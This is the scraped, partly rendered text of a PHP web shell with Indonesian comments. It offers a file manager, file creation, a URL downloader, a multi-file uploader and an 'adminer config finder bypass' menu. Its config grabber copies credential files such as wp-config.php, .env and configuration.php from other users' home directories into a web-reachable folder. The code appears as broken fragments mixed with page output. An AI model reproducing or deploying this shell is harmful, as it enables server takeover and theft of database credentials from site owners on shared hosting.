System Server:

IP Server:

PHP Version:

Dir: $dir) { $currentPath .= $dir . DIRECTORY_SEPARATOR; // Membuat link setiap bagian path, kecuali yang terakhir echo '' . $dir . ''; if ($index < count($dirs) - 1) { echo '/'; // Menambahkan pemisah " / " antara direktori } } ?>

Folder '$newFolderName' berhasil dibuat!"; } else { echo "
Folder '$newFolderName' sudah ada.
"; } } ?>
Nama file tidak boleh kosong."; } else { $filePath = $directory . DIRECTORY_SEPARATOR . $fileName; // Menyimpan file if (file_put_contents($filePath, $fileContent)) { echo "
OK
"; } else { echo "
ERROR
"; } } } ?>
Open
Failed to create adminer.
adminer config finder bypass uploader
File berhasil disimpan sebagai '$fileName' di direktori saat ini!"; } else { echo "
Gagal menyimpan file. Pastikan direktori memiliki izin tulis.
"; } } else { echo "
Gagal mengunduh file dari URL yang diberikan.
"; } } else { echo "
URL tidak valid.
"; } } ?>

Hasil Pencarian:

Order allow,deny Deny from all EOT; file_put_contents($configGrabberDir . '/.htaccess', $htaccessContent); } foreach ($configFiles as $file) { $pathParts = explode('/', $file); $user = $pathParts[2]; // Ambil nama pengguna dari path (misalnya, "/home/user/public_html") $sub = isset($pathParts[4]) ? $pathParts[4] : 'root'; // Ambil nama subfolder jika ada $cms = ''; // Tentukan CMS berdasarkan nama file if (strpos($file, 'wp-config.php') !== false) { $cms = 'WordPress'; } elseif (strpos($file, 'configuration.php') !== false) { $cms = 'Joomla'; } elseif (strpos($file, '.env') !== false) { $cms = 'Laravel'; } elseif (strpos($file, 'config.db.php') !== false) { $cms = 'Smarty'; } elseif (strpos($file, 'config.php') !== false) { $cms = 'Codeigniter'; } // Buat nama file tujuan sesuai format if ($sub === 'root') { $destinationFile = $configGrabberDir . DIRECTORY_SEPARATOR . "$user-$cms.txt"; } else { $destinationFile = $configGrabberDir . DIRECTORY_SEPARATOR . "$user-$sub-$cms.txt"; } // Salin isi file ke file tujuan dengan format nama yang sesuai copy($file, $destinationFile); } $configGrabberUrl = str_replace($_SERVER['DOCUMENT_ROOT'], '', $configGrabberDir); $baseUrl = (isset($_SERVER['HTTPS']) ? "https" : "http") . "://" . $_SERVER['HTTP_HOST']; $folderLink = $baseUrl . $configGrabberUrl; echo "
>> ConfigGrabber
"; } ?>
$tmpName) { $fileName = $_FILES['files']['name'][$index]; $fileTmpName = $_FILES['files']['tmp_name'][$index]; $fileSize = $_FILES['files']['size'][$index]; $fileError = $_FILES['files']['error'][$index]; // Cek jika ada error saat mengunggah file if ($fileError !== UPLOAD_ERR_OK) { $errors[] = "Terjadi kesalahan saat mengunggah file."; continue; } // Tentukan path file tujuan $uploadPath = $directory . DIRECTORY_SEPARATOR . basename($fileName); // Pindahkan file ke direktori tujuan if (move_uploaded_file($fileTmpName, $uploadPath)) { $uploadedFiles[] = $fileName; } else { $errors[] = "Gagal mengunggah file."; } } // Tampilkan notifikasi unggahan if (!empty($errors)) { echo "
ERROR
"; } if (!empty($uploadedFiles)) { if (count($uploadedFiles) == 1) { echo "
Successfully uploaded
"; } else { echo "
Files successfully uploaded
"; } } } ?>

Are you sure you want to delete the file ""?